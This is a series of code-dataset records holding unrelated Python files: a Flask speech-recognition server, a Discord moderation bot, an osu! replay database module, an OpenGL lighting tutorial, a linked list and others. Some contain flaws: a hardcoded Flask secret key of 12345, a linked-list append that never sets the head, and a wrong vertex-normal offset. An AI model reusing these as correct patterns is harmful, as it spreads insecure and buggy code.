read_inp(name_file_inp)\r\n \r\n\r\n # 
-------------------------------------------------------------------------\r\n # POST-PROCESSING\r\n BRICK = SHAPE_FUNCTIONS(3,8)\r\n \r\n #Parallel processing\r\n inputs = range(num_steps)\r\n# inputs = range(1)\r\n aux = pool.map(partial(read_odb, name_old=odb_name, num_steps = num_steps,num_instances=num_instances, \r\n print_pattern=print_pattern,ELE_TYPE=ELE_TYPE,R_table=R_table,table_nodes=table_nodes,table_CONEC=table_CONEC,BRICK=BRICK), inputs)\r\n \r\n myOdb.close()","sub_path":"Parallel_processing_Temperature.py","file_name":"Parallel_processing_Temperature.py","file_ext":"py","file_size_in_byte":20067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547879389","text":"from flask import Flask, render_template, request, jsonify\nfrom flask.ext.socketio import SocketIO, emit, session\nfrom background_asr import recognize_wav\nfrom online_asr import OnlineASR\n\napp = Flask(__name__)\napp.config.from_object(__name__)\nsocketio = SocketIO(app)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/recognize', methods=['POST'])\ndef recognize():\n response = recognize_wav(request.data)\n\n return jsonify(response)\n\n\n@socketio.on('begin')\ndef begin_recognition(message):\n session['recognizer'] = OnlineASR(emit)\n\n\n@socketio.on('chunk')\ndef recognize_chunk(message):\n session['recognizer'].recognize_chunk(message)\n\n\n@socketio.on('end')\ndef end_recognition(message):\n session['recognizer'].end()\n\n\nif __name__ == '__main__':\n app.secret_key = 12345\n socketio.run(app)\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653088529","text":"#!/usr/local/bin/python3\nimport discord\nfrom discord.ext import commands\nimport asyncio\nimport os\n\nbot = commands.Bot(command_prefix='!')\n\nwith 
open(f'{os.getcwd()}/token.txt', 'r') as token_file:\n bot.token = token_file.read().strip()\n\nwith open (f'{os.getcwd()}/bad_roles.txt') as bad_role_file:\n bad_roles = bad_role_file.readlines()\n bot.bad_role_list = []\n for line in bad_roles:\n bot.bad_role_list.append(line.strip().lower())\n\nwith open (f'{os.getcwd()}/excluded_roles.txt') as excluded_role_file:\n excluded_roles = excluded_role_file.readlines()\n bot.excluded_role_list = []\n for line in excluded_roles:\n bot.excluded_role_list.append(line.strip().lower())\n\nprint(bot.excluded_role_list)\n\n@bot.event\nasync def on_ready():\n print('------')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n\n@bot.event\nasync def on_message(message):\n if not message.author.bot:\n if check_if_user_mentioned_bad_role(message):\n if not check_if_user_has_excluded_role(message):\n await message.delete()\n await message.channel.send(f'{message.author.mention}\\n**#11** - __Do not tag **Event-OPs or Above**__\\n- If you need them, please wait in the support room for assistance.', delete_after=5)\n await asyncio.sleep(5)\n #await message.author.kick(reason='Tagging Staff')\n\ndef check_if_user_mentioned_bad_role(message):\n for mentioned_player in message.mentions:\n for roles in mentioned_player.roles:\n if roles.name in bot.bad_role_list:\n return True\n return False\n\ndef check_if_user_has_excluded_role(message):\n for roles in message.author.roles:\n if roles.name in bot.excluded_role_list:\n return True\n return False\n\nbot.run(bot.token)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"86246839","text":"import webapp2\nimport os\nfrom google.appengine.ext.webapp import template\n\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n \n folder = 'htm'\n file = 'home.htm'\n template_values = {'page': 'home'}\n\n path = os.path.join(folder, 
file)\n \n self.response.out.write(template.render(path, template_values))\n\nclass OutHandler(webapp2.RequestHandler):\n def get(self):\n \n url = self.request.get('url')\n \n folder = 'htm'\n file = 'out.htm'\n template_values = {'url': url}\n\n path = os.path.join(folder, file)\n \n self.response.out.write(template.render(path, template_values))\n\nclass GalleryHandler(webapp2.RequestHandler):\n def get(self):\n \n folder = 'htm'\n file = 'gallery.htm'\n template_values = {'page': 'gallery'}\n\n path = os.path.join(folder, file)\n \n self.response.out.write(template.render(path, template_values))\n\napp = webapp2.WSGIApplication([\n ('/out/.*', OutHandler),\n ('/gallery/.*', GalleryHandler),\n ('/.*', MainHandler)\n], debug=True)","sub_path":"trueamericanrulescom/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"138041823","text":"\"\"\"\nA module to handle queries on the DB.\n\"\"\"\n\nfrom decimal import Decimal\nfrom requests import get\n\nfrom osu_acc.replay import util\nfrom osu_acc.replay import classes\nfrom osu_acc.replay.models import Replay, ReplayData\nfrom osu_acc.beatmap.models import Beatmap, BreakPeriod, TimingPoint, HitObject\n\n\n# =============================================================================\n# REPLAY MODELS\n# =============================================================================\n\ndef create_replay_data_entry(replay_id, replay_events):\n \"\"\"\n Given a list of classes.ReplayEvents, create and save a models.ReplayData instance.\n\n Args:\n replay_events (List(classes.ReplayEvent)): The replay data.\n \"\"\"\n if ReplayData.objects.filter(replay_id=replay_id).exists():\n return\n\n replay_data_fields = {}\n\n replay_data_fields['replay_id'] = replay_id\n replay_data_fields['x_coords'] = []\n replay_data_fields['y_coords'] = []\n replay_data_fields['hit_object_times'] = []\n\n for replay_event 
in replay_events:\n replay_data_fields['x_coords'].append(replay_event.x)\n replay_data_fields['y_coords'].append(replay_event.y)\n replay_data_fields['hit_object_times'].append(replay_event.time)\n\n replay_data_entry = ReplayData(**replay_data_fields)\n replay_data_entry.save()\n\n\ndef select_replay_data_field(replay_id, field):\n \"\"\"\n Returns the value of the field of a specific ReplayData entry.\n\n Equivalent to: SELECT field FROM replay_replaydata WHERE replay_id = replay_id;\n\n Args:\n replay_id (str): The hash of the replay, given by osrparse.\n\n Returns:\n field: The field requested.\n Is of type: str, List(Decimal).\n \"\"\"\n\n valid_keys = set([\n 'x_coords',\n 'y_coords',\n 'hit_object_times',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n replay = Replay.objects.get(replay_id=replay_id)\n return getattr(replay, field)\n\n\ndef create_replay_entry(json_resp, parsed_replay):\n \"\"\"\n Create and save a Replay instance.\n\n Args:\n json_resp (dict): The result of the osu!api call as a dictionary.\n parsed_replay (osrparse.Replay): The parsed replay.\n \"\"\"\n\n if Replay.objects.filter(replay_id=parsed_replay.replay_hash).exists():\n return\n\n replay_fields = {}\n\n # GETTING ARGUMENTS AND CONVERTING TYPES\n circle_size = Decimal(json_resp['diff_size'])\n overall_diff = Decimal(json_resp['diff_overall'])\n break_periods_model = select_beatmap_field(json_resp['beatmap_id'], 'break_period')\n break_periods = util.convert_beatmap_break_periods_to_class(break_periods_model)\n replay_events = util.convert_osrp_play_data_to_class(parsed_replay.play_data)\n hit_objects_model = select_beatmap_field(json_resp['beatmap_id'], 'hit_object')\n hit_objects = util.convert_hit_object_model_to_class(hit_objects_model)\n\n # POPULATING FIELD DICTIONARY\n replay_fields['replay_id'] = parsed_replay.replay_hash\n replay_fields['beatmap'] = Beatmap.objects.get(beatmap_id=json_resp['beatmap_id'])\n replay_fields['play_date'] = 
parsed_replay.timestamp\n\n replay_fields['ap'] = 0.00\n replay_fields['pp'] = 0.00\n\n replay_fields['num_raw_300'] = parsed_replay.number_300s\n replay_fields['num_raw_100'] = parsed_replay.number_100s\n replay_fields['num_raw_50'] = parsed_replay.number_50s\n replay_fields['num_raw_miss'] = parsed_replay.misses\n replay_fields['raw_accuracy'] = util.get_accuracy(replay_fields['num_raw_300'],\n replay_fields['num_raw_100'],\n replay_fields['num_raw_50'],\n replay_fields['num_raw_miss'])\n\n\n true_acc_fields = util.get_true_accuracy_fields(circle_size,\n overall_diff,\n break_periods,\n replay_events,\n hit_objects)\n replay_fields = {**replay_fields, **true_acc_fields}\n replay_fields['true_accuracy'] = util.get_accuracy(replay_fields['num_true_300'],\n replay_fields['num_true_100'],\n replay_fields['num_true_50'],\n replay_fields['num_true_miss'])\n\n create_replay_data_entry(parsed_replay.replay_hash, replay_events)\n replay_fields['replay_data'] = ReplayData.objects.get(replay_id=parsed_replay.replay_hash)\n\n replay_fields['hit_errors'] = util.get_hit_errors(circle_size,\n overall_diff,\n break_periods,\n replay_events,\n hit_objects)\n\n hit_error_data = util.calc_hit_error_data(replay_fields['hit_errors'])\n replay_fields = {**replay_fields, **hit_error_data}\n\n # Create an instance of a Replay model\n replay_entry = Replay(**replay_fields)\n replay_entry.save()\n\n\ndef select_replay_field(replay_id, field):\n \"\"\"\n Returns the value of the field of a specific Replay entry.\n\n Equivalent to: SELECT field FROM replay_replay WHERE replay_id = replay_id;\n\n Args:\n replay_id (str): The hash of the replay, given by osrparse.\n\n Returns:\n query_set[field]: The field requested.\n Is of type: str, Beatmap, DateTime, Decimal, int, List(Decimal)\n \"\"\"\n\n valid_keys = set([\n 'beatmap',\n 'replay_data',\n 'play_date',\n 'pp',\n 'raw_accuracy',\n 'num_raw_300',\n 'num_raw_100',\n 'num_raw_50',\n 'num_raw_miss',\n 'ap',\n 'true_accuracy',\n 
'num_true_300',\n 'num_true_100',\n 'num_true_50',\n 'num_true_miss',\n 'hit_errors',\n 'min_neg_hit_error',\n 'max_neg_hit_error',\n 'avg_neg_hit_error',\n 'min_pos_hit_error',\n 'max_pos_hit_error',\n 'avg_pos_hit_error',\n 'min_abs_hit_error',\n 'max_abs_hit_error',\n 'avg_abs_hit_error',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n replaydata = ReplayData.objects.get(replay_id=replay_id)\n return getattr(replaydata, field)\n\n\n# =============================================================================\n# BEATMAP MODELS\n# =============================================================================\n\n\ndef create_break_period_entry(bm_id, data):\n \"\"\"\n Create and save a BreakPeriod entry.\n\n Equivalent to: INSERT INTO beatmap_breakperiod (fields) VALUES (values);\n\n Args:\n bm_id (str): The id of the beatmap associated.\n data (List(str)): The beatmap data as a list of strings.\n\n Returns:\n break_period_entry(BreakPeriod): The created BreakPeriod instance.\n \"\"\"\n\n if BreakPeriod.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Syntax: 2,start,end\n # The start and end fields are both an integral number of milliseconds,\n # from the beginning of the song,\n # defining the start and end point of the break period, respectively.\n\n break_fields = {}\n break_fields['beatmap_id'] = bm_id\n break_fields['starts'] = []\n break_fields['ends'] = []\n\n is_break = False\n\n for line in data:\n if 'Break Periods' in line.strip():\n is_break = True\n continue\n\n if is_break:\n # Next subsection, storyboarding, begins with the line\n # '//Storyboard Layer 0 (Background)\\n'\n if 'Storyboard' in line.strip():\n is_break = False\n else:\n start = int(line.split(',')[1])\n break_fields['starts'].append(start)\n end = int(line.split(',')[2])\n break_fields['ends'].append(end)\n\n break_entry = BreakPeriod(**break_fields)\n break_entry.save()\n\n\ndef select_break_period_field(beatmap_id, field):\n \"\"\"\n 
Returns the value of the field of a specific Break entry.\n\n Equivalent to: SELECT field FROM beatmap_break WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: List(int), List(Decimal).\n \"\"\"\n\n valid_keys = set(['starts', 'ends'])\n\n if field not in valid_keys:\n # TODO: Raise a proper exception.\n return None\n\n break_period = BreakPeriod.objects.get(beatmap_id=beatmap_id)\n return getattr(break_period, field)\n\n\ndef create_timing_point_entry(bm_id, data):\n \"\"\"\n Create and save a TimingPoint entry.\n\n Equivalent to: INSERT INTO beatmap_timingpoint (fields) VALUES (values);\n\n Args:\n bm_id (str): The id of the beatmap associated.\n data (List(str)): The beatmap data as a list of strings.\n\n Returns:\n timing_point_model(TimingPoint): The created TimingPoint instance.\n \"\"\"\n if TimingPoint.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Syntax: Offset, Milliseconds per Beat, Meter, \n # Sample Set, Sample Index, Volume, Inherited, Kiai Mode\n # For our purposes, we only need the first three fields.\n # We will also convert all ms/beat values to positive.\n timing_point_fields = {}\n timing_point_fields['beatmap_id'] = bm_id\n timing_point_fields['offsets'] = []\n timing_point_fields['ms_per_beats'] = []\n\n is_timing_point = False\n\n for line in data:\n if line.strip() == '[TimingPoints]':\n is_timing_point = True\n continue\n\n if is_timing_point:\n # There is always an empty line before the start of the next section\n # Use it to identify when the current section ends\n if not line.strip():\n is_timing_point = False\n else:\n offset = int(line.split(',')[0])\n timing_point_fields['offsets'].append(offset)\n ms_per_beat = Decimal(line.split(',')[1])\n timing_point_fields['ms_per_beats'].append(round(ms_per_beat, 2))\n\n timing_point_entry = TimingPoint(**timing_point_fields)\n timing_point_entry.save()\n\n\ndef 
select_timing_point_field(beatmap_id, field):\n \"\"\"\n Returns the value of the field of a specific TimingPoint entry.\n\n Equivalent to: SELECT field FROM beatmap_timingpoint WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: List(int), List(Decimal).\n \"\"\"\n\n valid_keys = set([\n 'offsets',\n 'ms_per_beats',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n timingpoint = TimingPoint.objects.get(beatmap_id=beatmap_id)\n return getattr(timingpoint, field)\n\n\ndef create_hit_object_entry(bm_id, data):\n \"\"\"\n Create and save a HitObject entry.\n\n Equivalent to: INSERT INTO beatmap_hitobject (fields) VALUES (values);\n\n Args:\n bm_id (str): The id of the beatmap associated.\n data (List(str)): The beatmap data as a list of strings.\n\n Returns:\n hit_object_model(HitObject): The created HitObject instance.\n \"\"\"\n if HitObject.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Syntax: x,y,time,type,hitSound...,extras\n # For our purposes, we only need the time field\n hit_object_fields = {}\n hit_object_fields['beatmap_id'] = bm_id\n hit_object_fields['x_coords'] = []\n hit_object_fields['y_coords'] = []\n hit_object_fields['hit_object_times'] = []\n hit_object_fields['hit_object_types'] = []\n\n is_hit_object = False\n\n for line in data:\n if line.strip() == '[HitObjects]':\n is_hit_object = True\n continue\n\n if is_hit_object:\n if not line.strip():\n is_hit_object = False\n else:\n x = line.split(',')[0]\n hit_object_fields['x_coords'].append(x)\n y = line.split(',')[1]\n hit_object_fields['y_coords'].append(y)\n obj_time = line.split(',')[2]\n hit_object_fields['hit_object_times'].append(obj_time)\n obj_type = line.split(',')[3]\n hit_object_fields['hit_object_types'].append(obj_type)\n\n hit_object_entry = HitObject(**hit_object_fields)\n hit_object_entry.save()\n\n\ndef 
select_hit_object_field(beatmap_id, field):\n \"\"\"\n Returns the value of the field of a specific HitObject entry.\n\n Equivalent to: SELECT field FROM beatmap_hitobject WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: List(Decimal).\n \"\"\"\n\n valid_keys = set([\n 'x_coords',\n 'y_coords',\n 'hit_object_times',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n hitobject = HitObject.objects.get(beatmap_id=beatmap_id)\n return getattr(hitobject, field)\n\n\ndef create_beatmap_entry(json_resp):\n \"\"\"\n Given a beatmap's API response as JSON,\n populate the database with the appropriate information.\n\n Args:\n json_resp (dict): The response from osu!api\n \"\"\"\n bm_id = json_resp['beatmap_id']\n\n if Beatmap.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Download beatmap file\n OSU_BEATMAP_ENDPOINT = 'https://osu.ppy.sh/osu/'\n response = get(OSU_BEATMAP_ENDPOINT + bm_id)\n\n with open(bm_id + '.osu', 'wb') as f:\n f.write(response.content)\n\n with open(bm_id + '.osu', 'r') as f:\n data = f.readlines()\n\n # Parse beatmap file for required data\n beatmap_fields = {}\n\n beatmap_fields['beatmap_id'] = bm_id\n\n beatmap_fields['song_title'] = json_resp['title']\n beatmap_fields['song_artist'] = json_resp['artist']\n beatmap_fields['beatmap_creator'] = json_resp['creator']\n beatmap_fields['beatmap_difficulty'] = json_resp['version']\n beatmap_fields['beatmap_cs'] = Decimal(json_resp['diff_size'])\n beatmap_fields['beatmap_od'] = Decimal(json_resp['diff_overall'])\n\n # Create and get model fields\n create_break_period_entry(bm_id, data)\n beatmap_fields['break_period'] = BreakPeriod.objects.get(beatmap_id=bm_id)\n create_timing_point_entry(bm_id, data)\n beatmap_fields['timing_point'] = TimingPoint.objects.get(beatmap_id=bm_id)\n create_hit_object_entry(bm_id, data)\n beatmap_fields['hit_object'] = 
HitObject.objects.get(beatmap_id=bm_id)\n\n # Create Beatmap model instance and save to DB\n beatmap_entry = Beatmap(**beatmap_fields)\n beatmap_entry.save()\n\n\ndef select_beatmap_field(beatmap_id, field):\n \"\"\"\n Returns the value of the field of a specific Beatmap entry.\n\n Equivalent to: SELECT field FROM beatmap_beatmap WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: TimingPoint, HitObject, str, Decimal.\n \"\"\"\n\n valid_keys = set([\n 'break_period',\n 'timing_point',\n 'hit_object',\n 'beatmap_creator',\n 'beatmap_difficulty',\n 'beatmap_cs',\n 'beatmap_od',\n 'song_title',\n 'song_artist',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n beatmap = Beatmap.objects.get(beatmap_id=beatmap_id)\n return getattr(beatmap, field)\n","sub_path":"osu_acc/replay/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":15790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173734479","text":"from PyQt5 import QtGui, QtCore, QtWidgets\nimport numpy as np\nfrom ctypes import c_float, c_uint, sizeof\nimport time\n\nfrom camera import CameraMovement, Camera\n\nGLfloat = c_float\nGLuint = c_uint\n\nWIDTH = 800\nHEIGHT = 600\n\n# camera\ncamera = Camera(position = QtGui.QVector3D(0., 0., 3.), \n up = QtGui.QVector3D(0., 1., 0.))\n\nfirstMouse = True\nlastX = WIDTH / 2.0\nlastY = HEIGHT / 2.0\n\n# timing\ndateTime = 0. 
# time between current frame and last frame\nlastFrame = 0.\n\nlightPos = QtGui.QVector3D(12., 20., -2.)\n\nclass Window(QtGui.QOpenGLWindow):\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n self.setTitle('LearnOpenGL')\n \n self.vertices = np.array(\n [[-0.5, -0.5, -0.5, 0.0, 0.0, -1.0],\n [ 0.5, -0.5, -0.5, 0.0, 0.0, -1.0],\n [ 0.5, 0.5, -0.5, 0.0, 0.0, -1.0],\n [ 0.5, 0.5, -0.5, 0.0, 0.0, -1.0],\n [-0.5, 0.5, -0.5, 0.0, 0.0, -1.0],\n [-0.5, -0.5, -0.5, 0.0, 0.0, -1.0],\n\n [-0.5, -0.5, 0.5, 0.0, 0.0, 1.0],\n [ 0.5, -0.5, 0.5, 0.0, 0.0, 1.0],\n [ 0.5, 0.5, 0.5, 0.0, 0.0, 1.0],\n [ 0.5, 0.5, 0.5, 0.0, 0.0, 1.0],\n [-0.5, 0.5, 0.5, 0.0, 0.0, 1.0],\n [-0.5, -0.5, 0.5, 0.0, 0.0, 1.0],\n\n [-0.5, 0.5, 0.5, -1.0, 0.0, 0.0],\n [-0.5, 0.5, -0.5, -1.0, 0.0, 0.0],\n [-0.5, -0.5, -0.5, -1.0, 0.0, 0.0],\n [-0.5, -0.5, -0.5, -1.0, 0.0, 0.0],\n [-0.5, -0.5, 0.5, -1.0, 0.0, 0.0],\n [-0.5, 0.5, 0.5, -1.0, 0.0, 0.0],\n\n [ 0.5, 0.5, 0.5, 1.0, 0.0, 0.0],\n [ 0.5, 0.5, -0.5, 1.0, 0.0, 0.0],\n [ 0.5, -0.5, -0.5, 1.0, 0.0, 0.0],\n [ 0.5, -0.5, -0.5, 1.0, 0.0, 0.0],\n [ 0.5, -0.5, 0.5, 1.0, 0.0, 0.0],\n [ 0.5, 0.5, 0.5, 1.0, 0.0, 0.0],\n\n [-0.5, -0.5, -0.5, 0.0, -1.0, 0.0],\n [ 0.5, -0.5, -0.5, 0.0, -1.0, 0.0],\n [ 0.5, -0.5, 0.5, 0.0, -1.0, 0.0],\n [ 0.5, -0.5, 0.5, 0.0, -1.0, 0.0],\n [-0.5, -0.5, 0.5, 0.0, -1.0, 0.0],\n [-0.5, -0.5, -0.5, 0.0, -1.0, 0.0],\n\n [-0.5, 0.5, -0.5, 0.0, 1.0, 0.0],\n [ 0.5, 0.5, -0.5, 0.0, 1.0, 0.0],\n [ 0.5, 0.5, 0.5, 0.0, 1.0, 0.0],\n [ 0.5, 0.5, 0.5, 0.0, 1.0, 0.0],\n [-0.5, 0.5, 0.5, 0.0, 1.0, 0.0],\n [-0.5, 0.5, -0.5, 0.0, 1.0, 0.0]], dtype=GLfloat\n )\n \n def initializeGL(self):\n self.gl = self.context().versionFunctions()\n self.gl.glViewport(0, 0, WIDTH, HEIGHT)\n self.gl.glEnable(self.gl.GL_DEPTH_TEST)\n self.gl.glClearColor(0.1, 0.1, 0.1, 1.)\n \n ########################################################\n # Create a shader program\n \n self.lightingShaderProg = QtGui.QOpenGLShaderProgram()\n 
self.lightingShaderProg.create()\n self.lightingShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Vertex, '2.1.basic_lighting.vert')\n self.lightingShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Fragment, '2.1.basic_lighting.frag')\n self.lightingShaderProg.link()\n ########################################################\n \n ########################################################\n # Create a shader program\n \n self.lampShaderProg = QtGui.QOpenGLShaderProgram()\n self.lampShaderProg.create()\n self.lampShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Vertex, '2.1.lamp.vert')\n self.lampShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Fragment, '2.1.lamp.frag')\n self.lampShaderProg.link()\n ########################################################\n \n \n ########################################################\n # create a Vertex Array Object with vertice information\n \n self.cubeVAO = QtGui.QOpenGLVertexArrayObject()\n self.cubeVAO.create()\n self.cubeVAO.bind()\n \n VBO = QtGui.QOpenGLBuffer(QtGui.QOpenGLBuffer.VertexBuffer)\n VBO.create()\n VBO.setUsagePattern(QtGui.QOpenGLBuffer.StaticDraw)\n data = self.vertices.tostring()\n VBO.bind()\n VBO.allocate(data, len(data))\n self.gl.glVertexAttribPointer(0, 3, self.gl.GL_FLOAT, \n self.gl.GL_FALSE, 6*sizeof(GLfloat), 0)\n self.gl.glEnableVertexAttribArray(0)\n self.gl.glVertexAttribPointer(1, 3, self.gl.GL_FLOAT, \n self.gl.GL_FALSE, 6*sizeof(GLfloat), 0)\n self.gl.glEnableVertexAttribArray(1)\n \n VBO.release()\n self.cubeVAO.release()\n ########################################################\n \n ########################################################\n # create a Vertex Array Object with vertice information\n \n self.lightVAO = QtGui.QOpenGLVertexArrayObject()\n self.lightVAO.create()\n self.lightVAO.bind()\n \n VBO.bind()\n self.gl.glVertexAttribPointer(0, 3, self.gl.GL_FLOAT, \n self.gl.GL_FALSE, 6*sizeof(GLfloat), 0)\n self.gl.glEnableVertexAttribArray(0)\n \n 
VBO.release()\n self.lightVAO.release()\n ########################################################\n \n def paintGL(self):\n currentFrame = time.time()\n global deltaTime, lastFrame\n deltaTime = currentFrame - lastFrame\n lastFrame = currentFrame\n \n self.gl.glClear(self.gl.GL_COLOR_BUFFER_BIT | \\\n self.gl.GL_DEPTH_BUFFER_BIT)\n \n self.lightingShaderProg.bind()\n self.lightingShaderProg.setUniformValue('objectColor', 1., 0.5, 0.31)\n self.lightingShaderProg.setUniformValue('lightColor', 1., 1., 1.)\n self.lightingShaderProg.setUniformValue('lightPos', lightPos)\n projection = QtGui.QMatrix4x4()\n projection.perspective(camera.zoom, WIDTH/HEIGHT, 0.1, 100.)\n self.lightingShaderProg.setUniformValue('projection', projection)\n self.lightingShaderProg.setUniformValue('view', camera.viewMatrix)\n self.lightingShaderProg.setUniformValue('model', QtGui.QMatrix4x4())\n\n self.cubeVAO.bind()\n self.gl.glDrawArrays(self.gl.GL_TRIANGLES, 0, 36)\n \n self.lampShaderProg.bind()\n self.lampShaderProg.setUniformValue('projection', projection)\n self.lampShaderProg.setUniformValue('view', camera.viewMatrix)\n model = QtGui.QMatrix4x4()\n model.translate(lightPos)\n model.scale(0.2)\n self.lampShaderProg.setUniformValue('model', model)\n\n self.lightVAO.bind()\n self.gl.glDrawArrays(self.gl.GL_TRIANGLES, 0, 36)\n \n self.update()\n \n def keyPressEvent(self, event):\n global deltaTime\n \n if event.key() == QtCore.Qt.Key_Escape:\n sys.exit()\n elif event.key() == QtCore.Qt.Key_W:\n camera.processKeyboard(CameraMovement.FORWARD, deltaTime)\n elif event.key() == QtCore.Qt.Key_S:\n camera.processKeyboard(CameraMovement.BACKWARD, deltaTime)\n elif event.key() == QtCore.Qt.Key_A:\n camera.processKeyboard(CameraMovement.LEFT, deltaTime)\n elif event.key() == QtCore.Qt.Key_D:\n camera.processKeyboard(CameraMovement.RIGHT, deltaTime)\n \n event.accept()\n \n def mouseMoveEvent(self, event):\n global firstMouse, lastX, lastY\n \n if firstMouse:\n lastX, lastY = event.globalX(), 
event.globalY()\n firstMouse = False\n \n xoffset = event.globalX() - lastX\n yoffset = lastY - event.globalY()\n lastX, lastY = event.globalX(), event.globalY()\n \n camera.processMouseMovement(xoffset, yoffset)\n event.accept()\n \n def wheelEvent(self, event):\n camera.processMouseScroll(event.angleDelta().y())\n event.accept()\n \n def closeEvent(self, event):\n sys.exit()\n event.accept()\n\n\nif __name__ == '__main__':\n import sys\n \n # Set format here, otherwise it throws error\n # `QCocoaGLContext: Falling back to unshared context.`\n # on Mac when use QOpenGLWidgets\n # https://doc.qt.io/qt-5/qopenglwidget.html#details last paragraph\n format = QtGui.QSurfaceFormat()\n format.setRenderableType(QtGui.QSurfaceFormat.OpenGL)\n format.setProfile(QtGui.QSurfaceFormat.CoreProfile)\n format.setVersion(4, 1)\n format.setDepthBufferSize(24)\n QtGui.QSurfaceFormat.setDefaultFormat(format)\n \n app = QtWidgets.QApplication(sys.argv)\n \n window = Window()\n window.resize(WIDTH, HEIGHT)\n window.show()\n \n sys.exit(app.exec_())\n","sub_path":"OpenGL/Joey_de_Vries/qopengl/01_lighting/02_basic_lighting/part02_diffuse_lighting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446394130","text":"class node():\n\tdef __init__(self, data = None, link = None):\n\t\tself.data = data\n\t\tself.link = link\n\nclass SLL():\n\tdef __init__(self, head = None):\n\t\tself.head = head\n\n\tdef append(self, data):\n\t\tnewnode = node(data)\n\t\t\n\t\tif self.head == None:\n\t\t\thead = newnode\n\t\t\treturn\n\t\ttemp = self.head\n\t\twhile temp.link:\n\t\t\ttemp = temp.link\n\n\t\ttemp.link = newnode\n\n\tdef push(self, data):\n\t\tnewnode = node(data)\n\t\tif self.head == None:\n\t\t\tself.head = newnode\n\t\t\treturn\n\t\tnewnode.link = self.head\n\t\tself.head = newnode\n\n\tdef popLast(self):\n\t\tif self.head == None:\n\t\t\traise ValueError('Linked 
List is NULL')\n\t\ttemp = self.head\n\t\t\n\t\twhile temp.link.link:\n\t\t\ttemp = temp.link\n\n\t\tvalue = temp.link.data\n\t\ttemp.link = None\n\t\treturn value\n\n\tdef popFront(self):\n\t\tif self.head == None:\n\t\t\traise ValueError('Linked List is Null')\n\t\tvalue = self.head.data\n\t\tself.head = self.head.link\n\t\treturn value\n\n\tdef printList(self):\n\t\ttemp = self.head\n\t\twhile temp:\n\t\t\tprint(temp.data)\n\t\t\ttemp = temp.link\n\t\t \n\n","sub_path":"easy_ds/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"580481647","text":"# Given the root of a binary tree, invert the tree, and return its root.\n# Input: root = [4,2,7,1,3,6,9]\n# Output: [4,7,2,9,6,3,1]\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n if root:\n if root.left!=None and root.right!=None:\n rootTemp=TreeNode()\n rootTemp=root.left\n root.left=root.right\n root.right=rootTemp\n self.invertTree(root.left)\n self.invertTree(root.right)\n elif root.left!=None and root.right==None:\n root.right=root.left\n root.left=None\n self.invertTree(root.right)\n elif root.left==None and root.right!=None:\n root.left=root.right\n root.right=None\n self.invertTree(root.left)\n return root\n return root \n ","sub_path":"InvertBinaryTree.py","file_name":"InvertBinaryTree.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"199309632","text":"import dearpygui.dearpygui as dpg\n\ndpg.create_context()\n\n\n# def clipper_toggle(sender):\n# dpg.configure_item(\"table_clip\", clipper=dpg.get_value(sender))\n\n\nwith dpg.window(label=\"Tutorial\"):\n # 
